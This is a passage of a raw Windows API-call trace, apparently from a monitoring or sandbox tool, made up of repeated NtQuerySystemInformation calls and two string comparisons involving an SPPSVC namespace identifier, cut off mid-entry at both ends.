ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.962] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0273.969] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0273.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0273.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x50, ResultLength=0x0) [0273.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x50, ResultLength=0x0) [0273.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x50, ResultLength=0x0) [0273.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7d0, Length=0x28, ResultLength=0x0) [0274.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0274.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x20, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x20, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x20, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x20, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0274.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, 